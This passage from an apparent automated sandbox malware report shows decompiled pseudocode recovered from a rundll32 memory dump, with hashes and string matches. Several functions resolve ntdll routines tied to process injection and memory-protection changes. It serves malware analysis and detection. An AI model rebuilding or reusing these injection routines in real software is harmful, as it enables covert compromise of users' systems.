				if (E00000285285C809AA5C( *0xc8144e7c, _t120, _v80, _t172, _t160,  &_a16) != 0) goto 0xc809a069;
				r9d = 0;
				_v120 = _v120 & 0;
				if (E00000285285C809ACE8(0,  *0xc8144e7c, _t120, _v96, 0xc8144e40, _t157, _t160, _a16, _t170, _t171) != 0) goto 0xc809a069;
				_t93 = _a40;
				r12d =  ==  ? _t93 : r12d;
				_t65 = E00000285285C809AB8C(r12d, _t113, _t120,  &_v104, _t154, _t157,  &_v88);
				_t158 = _v88;
				if (_t65 != 0) goto 0xc809a065;
				_t168 =  &_v72;
				if (E00000285285C809AA5C(_t113, _t120, _t158, _t172, _t160, _t168) != 0) goto 0xc809a065;
				r8d = _t93;
				E00000285285C80C7310(r12d, _t93, 0, _t95, _v104, _v64, _v104, _t158, _t168);
				_t128 = _t179 + 0x28;
				r8d = 0;
				r13d = r14d;
				_t175 = _v96 + _t172;
				 *((long long*)(_t175 + 0x150)) = _a16;
				 *((long long*)(_t175 + 0x28)) = _t168;
				_t115 = _v72;
				 *(_t175 + 0x30) = _t115;
				 *((intOrPtr*)(_t175 + 0x40)) =  *((intOrPtr*)(_t179 + 0x18));
				 *((intOrPtr*)(_t175 + 0x38)) = r8d;
				 *((intOrPtr*)(_t175 + 0x3c)) = r12d;
				_t69 =  *((intOrPtr*)(_t179 + 0x1c));
				 *((intOrPtr*)(_t175 + 0x44)) = _t69;
				if ( *((intOrPtr*)(_t128 + (_t115 | 0xffffffff) + 1)) != r8b) goto 0xc8099f91;
				if (_t69 == 0) goto 0xc8099fb1;
				_t148 = _t175 + 0x50 - _t128;
				_t70 =  *_t128;
				 *((char*)(_t148 + _t128)) = _t70;
				if (_t70 != 0) goto 0xc8099fa5;
				_t71 = E00000285285C8099CF0((_t115 | 0xffffffff) + 1, _t120, _t175, _t158);
				_t106 = _t71;
				if (_t106 != 0) goto 0xc809a069;
				_t50 = _t148 + 0x40; // 0x80
				r8d = _t50;
				asm("movups xmm0, [ecx]");
				asm("movups [eax], xmm0");
				asm("movups xmm1, [ecx+0x10]");
				asm("movups [eax+0x10], xmm1");
				asm("movups xmm0, [ecx+0x20]");
				asm("movups [eax+0x20], xmm0");
				asm("movups xmm1, [ecx+0x30]");
				asm("movups [eax+0x30], xmm1");
				asm("movups xmm0, [ecx+0x40]");
				asm("movups [eax+0x40], xmm0");
				asm("movups xmm1, [ecx+0x50]");
				asm("movups [eax+0x50], xmm1");
				asm("movups xmm0, [ecx+0x60]");
				asm("movups [eax+0x60], xmm0");
				_t119 = _t175 + 0x168 + _t168;
				asm("movups xmm1, [ecx+0x70]");
				asm("movups [eax-0x10], xmm1");
				if (_t106 != 0) goto 0xc8099fd8;
				GetModuleHandleW(??);
				if (_t119 == 0) goto 0xc809a069;
				GetProcAddress(??, ??);
				_v120 = _v120 & 0x00000000;
				r9d = 0;
				 *_t119();
				goto 0xc809a069;
				if (_v96 == 0) goto 0xc809a083;
				GetCurrentProcess();
				E00000285285C809AB18();
				if (_v80 == 0) goto 0xc809a092;
				CloseHandle(??);
				if (_v104 == 0) goto 0xc809a0a8;
				GetCurrentProcess();
				E00000285285C809AB18();
				if (_t158 == 0) goto 0xc809a0b6;
				CloseHandle(??);
				return _t71;
			}




































                0x285c8099e18
                0x285c8099e18
                0x285c8099e18
                0x285c8099e1d
                0x285c8099e22
                0x285c8099e39
                0x285c8099e3f
                0x285c8099e43
                0x285c8099e49
                0x285c8099e4c
                0x285c8099e52
                0x285c8099e58
                0x285c8099e5c
                0x285c8099e60
                0x285c8099e64
                0x285c8099e68
                0x285c8099e6c
                0x285c8099e72
                0x285c8099e77
                0x285c8099e7c
                0x285c8099e92
                0x285c8099e96
                0x285c8099e9d
                0x285c8099eb4
                0x285c8099ece
                0x285c8099ee3
                0x285c8099ee6
                0x285c8099ef3
                0x285c8099ef9
                0x285c8099f07
                0x285c8099f0e
                0x285c8099f13
                0x285c8099f1b
                0x285c8099f21
                0x285c8099f34
                0x285c8099f3e
                0x285c8099f48
                0x285c8099f51
                0x285c8099f55
                0x285c8099f58
                0x285c8099f5f
                0x285c8099f62
                0x285c8099f69
                0x285c8099f6d
                0x285c8099f71
                0x285c8099f79
                0x285c8099f7d
                0x285c8099f81
                0x285c8099f85
                0x285c8099f89
                0x285c8099f98
                0x285c8099f9c
                0x285c8099fa2
                0x285c8099fa5
                0x285c8099fa7
                0x285c8099faf
                0x285c8099fb4
                0x285c8099fbb
                0x285c8099fbd
                0x285c8099fc6
                0x285c8099fc6
                0x285c8099fd8
                0x285c8099fdb
                0x285c8099fde
                0x285c8099fe2
                0x285c8099fe6
                0x285c8099fea
                0x285c8099fee
                0x285c8099ff2
                0x285c8099ff6
                0x285c8099ffa
                0x285c8099ffe
                0x285c809a002
                0x285c809a006
                0x285c809a00a
                0x285c809a00e
                0x285c809a011
                0x285c809a018
                0x285c809a020
                0x285c809a030
                0x285c809a039
                0x285c809a045
                0x285c809a056
                0x285c809a05b
                0x285c809a061
                0x285c809a063
                0x285c809a070
                0x285c809a072
                0x285c809a07e
                0x285c809a08a
                0x285c809a08c
                0x285c809a095
                0x285c809a097
                0x285c809a0a3
                0x285c809a0ab
                0x285c809a0b0
                0x285c809a0cf

                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: NtQueueApcThread$is program cannot be run in DOS mode.$$ntdll.dll
                • API String ID: 0-1695160815
                • Opcode ID: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction ID: 027a8ac155976b855acda79acc3ffd70ccbdace98c9ac0c9d92f8c2712c83886
                • Opcode Fuzzy Hash: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction Fuzzy Hash: 0A81C17AB01F6186EB00DF69D8496AC37A4FB99B88F00D226DE1C63755EF38D195CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80DDCCC Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000285285C80DDCCC(void* __edx, char* __r8, void* __r9) {
				void* _t7;
				signed long long _t11;
				signed long long _t12;
				void* _t16;
				void* _t18;

				_t17 = _t18 - 0x4f;
				_t19 = _t18 - 0xc0;
				_t11 =  *0xc814c720; // 0xee50a592130
				_t12 = _t11 ^ _t18 - 0x000000c0;
				 *(_t18 - 0x4f + 0x3f) = _t12;
				if (__r9 - _t12 + 4 >= 0) goto 0xc80ddd18;
				 *__r8 = 0;
				return E00000285285C80C59D0(_t7,  *(_t17 + 0x3f) ^ _t19, _t16, __r8);
			}








                0x285c80ddcce
                0x285c80ddcd3
                0x285c80ddcda
                0x285c80ddce1
                0x285c80ddce4
                0x285c80ddcf8
                0x285c80ddcfa
                0x285c80ddd17

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                • API String ID: 3215553584-2617248754
                • Opcode ID: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction ID: 76eab542277d6291102fed3703e3a6a6f6dc938b6ce7571890fbbbc1d68f8963
                • Opcode Fuzzy Hash: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction Fuzzy Hash: 5B418B7AA12F6499EB04CF25E88578A37E4E718798F01812BEE5817B95EE3CC025C744
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8099CF0 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 33%
                			E00000285285C8099CF0(long long __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				void* _t16;
				void* _t17;
				void* _t18;
				long long _t27;
				long long _t29;
				void* _t44;
				void* _t51;
				void* _t52;

				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t16 =  *0xc81532d0 - _t44; // 0x0
				if (_t16 == 0) goto 0xc8099d23;
				_t17 =  *0xc81532d8 - _t44; // 0x0
				if (_t17 == 0) goto 0xc8099d23;
				_t18 =  *0xc81532e0 - _t44; // 0x0
				if (_t18 != 0) goto 0xc8099de4;
				GetModuleHandleW(??);
				_t29 = __rax;
				if (__rax == 0) goto 0xc8099e06;
				GetModuleHandleW(??);
				if (__rax == 0) goto 0xc8099e06;
				E00000285285C809A2DC(__rax, __rax, __rax, "LdrLoadDll", _t51, _t52);
				 *0xc81532d0 = _t27;
				if (_t27 == 0) goto 0xc8099e06;
				E00000285285C809A2DC(_t27, _t29, _t29, "LdrGetProcedureAddress", _t51, _t52);
				 *0xc81532d8 = _t27;
				if (_t27 == 0) goto 0xc8099e06;
				E00000285285C809A2DC(_t27, _t29, _t29, "ZwProtectVirtualMemory", _t51, _t52);
				 *0xc81532e0 = _t27;
				if (_t27 == 0) goto 0xc8099e06;
				E00000285285C809A2DC(_t27, _t29, _t29, "RtlAnsiStringToUnicodeString", _t51, _t52);
				 *0xc81532e8 = _t27;
				if (_t27 == 0) goto 0xc8099e06;
				E00000285285C809A2DC(_t27, _t29, _t29, "RtlFreeUnicodeString", _t51, _t52);
				 *0xc81532f0 = _t27;
				if (_t27 == 0) goto 0xc8099e06;
				asm("movups xmm0, [0xb94e5]");
				asm("movups [esi], xmm0");
				asm("movups xmm1, [0xb94eb]");
				asm("movups [esi+0x10], xmm1");
				asm("movsd xmm0, [0xb94ef]");
				asm("movsd [esi+0x20], xmm0");
				return 0;
			}











                0x285c8099cf0
                0x285c8099cf0
                0x285c8099cf5
                0x285c8099d04
                0x285c8099d0b
                0x285c8099d0d
                0x285c8099d14
                0x285c8099d16
                0x285c8099d1d
                0x285c8099d2f
                0x285c8099d35
                0x285c8099d3b
                0x285c8099d48
                0x285c8099d51
                0x285c8099d61
                0x285c8099d66
                0x285c8099d70
                0x285c8099d80
                0x285c8099d85
                0x285c8099d8f
                0x285c8099d9b
                0x285c8099da0
                0x285c8099daa
                0x285c8099db6
                0x285c8099dbb
                0x285c8099dc5
                0x285c8099dd1
                0x285c8099dd6
                0x285c8099de0
                0x285c8099de4
                0x285c8099deb
                0x285c8099dee
                0x285c8099df5
                0x285c8099df9
                0x285c8099e01
                0x285c8099e17

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule
                • String ID: LdrGetProcedureAddress$LdrLoadDll$RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$ZwProtectVirtualMemory$kernel32.dll$ntdll.dll
                • API String ID: 4139908857-3936008073
                • Opcode ID: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction ID: a3aca1754a0c3c29b0695830e9434583104190e3e689942191cfdd759c56d5b0
                • Opcode Fuzzy Hash: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction Fuzzy Hash: 40318F3C613FA580FA51DB19B84936463E0EB467C0F48D227986D173A2EF7CE095CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8057CB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 40%
                			E00000285285C8057CB0(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed char** __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v272;
				intOrPtr _v292;
				long long _v304;
				char _v312;
				void* __rdi;
				signed int _t21;
				void* _t30;
				void* _t33;
				void* _t34;
				signed char** _t43;
				void* _t64;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t64 = __rcx;
				r8d = 0x128;
				_t43 = __r9;
				E00000285285C80C8EF0(_t30, 0, _t33, _t34,  &_v312, __rdx, __r8, __r8);
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xc8057cf1;
				goto 0xc8057cf4;
				_v304 = __r8;
				_v292 =  *((intOrPtr*)(__r8 + 0x10));
				if (_t43[2] == 0) goto 0xc8057d31;
				if (_t43[3] - 0x10 < 0) goto 0xc8057d11;
				asm("o16 nop [eax+eax]");
				_t21 =  *( *_t43) & 0x000000ff;
				_v272 = _t21;
				if (_t21 != 0) goto 0xc8057d20;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				 *((long long*)(__r8))();
				 *((long long*)(__r8))();
				if (_t64 == 0) goto 0xc8057d8b;
				E00000285285C8099E18(__r8,  &_v312, "NtResumeProcess", __rdx, _t64);
				CloseHandle(??);
				return 1;
			}















                0x285c8057cb0
                0x285c8057cb5
                0x285c8057cba
                0x285c8057ccd
                0x285c8057cd2
                0x285c8057cdd
                0x285c8057ce0
                0x285c8057cea
                0x285c8057cef
                0x285c8057cf9
                0x285c8057d01
                0x285c8057d05
                0x285c8057d0c
                0x285c8057d16
                0x285c8057d20
                0x285c8057d27
                0x285c8057d2f
                0x285c8057d38
                0x285c8057d4b
                0x285c8057d5e
                0x285c8057d67
                0x285c8057d6b
                0x285c8057d70
                0x285c8057d7d
                0x285c8057d85
                0x285c8057da5

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleProc$CloseModule
                • String ID: NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 133214361-1717905385
                • Opcode ID: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction ID: 762112d5e9f197123531ceefa792b3eb3227e9a0450e0458a3d535b3b39a7484
                • Opcode Fuzzy Hash: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction Fuzzy Hash: B6217A3A206FA081EB00DF21E4487A96360F74AFC1F488022DE4D53799DF3DC65ACB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A9A44 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000285285C80A9A44(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000285285C80A19DC(0,  &_a16);
				_t79 =  *0xc8151bf8; // 0x0
				_a24 = _t79;
				_t56 =  *0xc8151b48; // 0x0
				if (_t56 != 0) goto 0xc80a9abf;
				E00000285285C80A19DC(0,  &_a8);
				_t43 =  *0xc8151b48 - _t56; // 0x0
				if (_t43 != 0) goto 0xc80a9aae;
				_t26 =  *0xc8151908; // 0x0
				 *0xc8151908 = _t26 + 1;
				 *0xc8151b48 = _t51;
				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
				_t57 =  *0xc8151b48; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9ad3;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0xc80a9ad5;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9b62;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9afb;
				E00000285285C80A6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9af9;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0xc80a9afb;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9b62;
				if (_t79 == 0) goto 0xc80a9b0a;
				goto 0xc80a9b62;
				E00000285285C80AC5D8(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0xc80a9b39;
				E00000285285C8087290( &_v48);
				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0xc8151bf8 = _t78;
				0xc80c5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
			}


















                0x285c80a9a44
                0x285c80a9a4c
                0x285c80a9a55
                0x285c80a9a5a
                0x285c80a9a64
                0x285c80a9a6a
                0x285c80a9a71
                0x285c80a9a76
                0x285c80a9a80
                0x285c80a9a89
                0x285c80a9a8e
                0x285c80a9a95
                0x285c80a9a97
                0x285c80a9a9f
                0x285c80a9aa7
                0x285c80a9ab3
                0x285c80a9ab8
                0x285c80a9abf
                0x285c80a9ac7
                0x285c80a9ac9
                0x285c80a9ad1
                0x285c80a9ad8
                0x285c80a9ae2
                0x285c80a9ae4
                0x285c80a9aed
                0x285c80a9aef
                0x285c80a9af7
                0x285c80a9afe
                0x285c80a9b03
                0x285c80a9b08
                0x285c80a9b12
                0x285c80a9b1b
                0x285c80a9b22
                0x285c80a9b33
                0x285c80a9b38
                0x285c80a9b39
                0x285c80a9b3e
                0x285c80a9b4f
                0x285c80a9b57
                0x285c80a9b7b

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction ID: b736d0cc8ab3d9e9520fed24427ef3522a0c56d9a1deda62c2fa166d3d9640e4
                • Opcode Fuzzy Hash: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction Fuzzy Hash: 2D31932A717F2081FB11DB15D5482D967A5E790BE0F18C2539A7D537E9DE3CD442CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A9B7C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000285285C80A9B7C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000285285C80A19DC(0,  &_a16);
				_t79 =  *0xc8151bf0; // 0x0
				_a24 = _t79;
				_t56 =  *0xc8151b40; // 0x0
				if (_t56 != 0) goto 0xc80a9bf7;
				E00000285285C80A19DC(0,  &_a8);
				_t43 =  *0xc8151b40 - _t56; // 0x0
				if (_t43 != 0) goto 0xc80a9be6;
				_t26 =  *0xc8151908; // 0x0
				 *0xc8151908 = _t26 + 1;
				 *0xc8151b40 = _t51;
				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
				_t57 =  *0xc8151b40; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9c0b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0xc80a9c0d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9c9a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9c33;
				E00000285285C80A6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9c31;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0xc80a9c33;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9c9a;
				if (_t79 == 0) goto 0xc80a9c42;
				goto 0xc80a9c9a;
				E00000285285C80AC6B8(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0xc80a9c71;
				E00000285285C8087290( &_v48);
				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0xc8151bf0 = _t78;
				0xc80c5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
			}


















                0x285c80a9b7c
                0x285c80a9b84
                0x285c80a9b8d
                0x285c80a9b92
                0x285c80a9b9c
                0x285c80a9ba2
                0x285c80a9ba9
                0x285c80a9bae
                0x285c80a9bb8
                0x285c80a9bc1
                0x285c80a9bc6
                0x285c80a9bcd
                0x285c80a9bcf
                0x285c80a9bd7
                0x285c80a9bdf
                0x285c80a9beb
                0x285c80a9bf0
                0x285c80a9bf7
                0x285c80a9bff
                0x285c80a9c01
                0x285c80a9c09
                0x285c80a9c10
                0x285c80a9c1a
                0x285c80a9c1c
                0x285c80a9c25
                0x285c80a9c27
                0x285c80a9c2f
                0x285c80a9c36
                0x285c80a9c3b
                0x285c80a9c40
                0x285c80a9c4a
                0x285c80a9c53
                0x285c80a9c5a
                0x285c80a9c6b
                0x285c80a9c70
                0x285c80a9c71
                0x285c80a9c76
                0x285c80a9c87
                0x285c80a9c8f
                0x285c80a9cb3

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction ID: 3e5bafb773d9ba9b8eec6a4ee98544f35f56f7a8b6c9347bb05eca15ea357903
                • Opcode Fuzzy Hash: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction Fuzzy Hash: F7313C2E307F2081EB119B15E9583E967A5E794BE0F58C253EA6D176E9DE3CD4428B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A9CB4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000285285C80A9CB4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000285285C80A19DC(0,  &_a16);
				_t79 =  *0xc8151c18; // 0x0
				_a24 = _t79;
				_t56 =  *0xc8151b58; // 0x0
				if (_t56 != 0) goto 0xc80a9d2f;
				E00000285285C80A19DC(0,  &_a8);
				_t43 =  *0xc8151b58 - _t56; // 0x0
				if (_t43 != 0) goto 0xc80a9d1e;
				_t26 =  *0xc8151908; // 0x0
				 *0xc8151908 = _t26 + 1;
				 *0xc8151b58 = _t51;
				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
				_t57 =  *0xc8151b58; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9d43;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0xc80a9d45;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9dd2;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9d6b;
				E00000285285C80A6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9d69;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0xc80a9d6b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9dd2;
				if (_t79 == 0) goto 0xc80a9d7a;
				goto 0xc80a9dd2;
				E00000285285C80AC798(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0xc80a9da9;
				E00000285285C8087290( &_v48);
				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0xc8151c18 = _t78;
				0xc80c5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
			}



















                0x285c80a9cb4
                0x285c80a9cbc
                0x285c80a9cc5
                0x285c80a9cca
                0x285c80a9cd4
                0x285c80a9cda
                0x285c80a9ce1
                0x285c80a9ce6
                0x285c80a9cf0
                0x285c80a9cf9
                0x285c80a9cfe
                0x285c80a9d05
                0x285c80a9d07
                0x285c80a9d0f
                0x285c80a9d17
                0x285c80a9d23
                0x285c80a9d28
                0x285c80a9d2f
                0x285c80a9d37
                0x285c80a9d39
                0x285c80a9d41
                0x285c80a9d48
                0x285c80a9d52
                0x285c80a9d54
                0x285c80a9d5d
                0x285c80a9d5f
                0x285c80a9d67
                0x285c80a9d6e
                0x285c80a9d73
                0x285c80a9d78
                0x285c80a9d82
                0x285c80a9d8b
                0x285c80a9d92
                0x285c80a9da3
                0x285c80a9da8
                0x285c80a9da9
                0x285c80a9dae
                0x285c80a9dbf
                0x285c80a9dc7
                0x285c80a9deb

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction ID: 104ceb6515759f92c0efb2046dded9b641105c295a2e1af0b638cd3a3885cdfd
                • Opcode Fuzzy Hash: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction Fuzzy Hash: 5931822A707F6081EB11DB16D9482D967A1E780BE0F188253DA6D177EADE3CD482CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A1D0C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000285285C80A1D0C(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				signed long long _t56;
				intOrPtr _t63;
				intOrPtr* _t77;
				long long _t78;
				void* _t79;

				_t50 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t79 = __rcx;
				E00000285285C80A19DC(0,  &_a16);
				_t78 =  *0xc81518f8; // 0x0
				_a24 = _t78;
				_t55 =  *0xc81518d8; // 0x0
				if (_t55 != 0) goto 0xc80a1d87;
				E00000285285C80A19DC(0,  &_a8);
				_t42 =  *0xc81518d8 - _t55; // 0x0
				if (_t42 != 0) goto 0xc80a1d76;
				_t26 =  *0xc8151908; // 0x0
				 *0xc8151908 = _t26 + 1;
				 *0xc81518d8 = _t50;
				_t29 = E00000285285C80A1A5C(_t50,  &_a8);
				_t56 =  *0xc81518d8; // 0x0
				_t63 = _a8;
				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0xc80a1d9b;
				_t51 =  *((intOrPtr*)(_t63 + 0x10));
				goto 0xc80a1d9d;
				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0xc80a1e2a;
				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0xc80a1dc3;
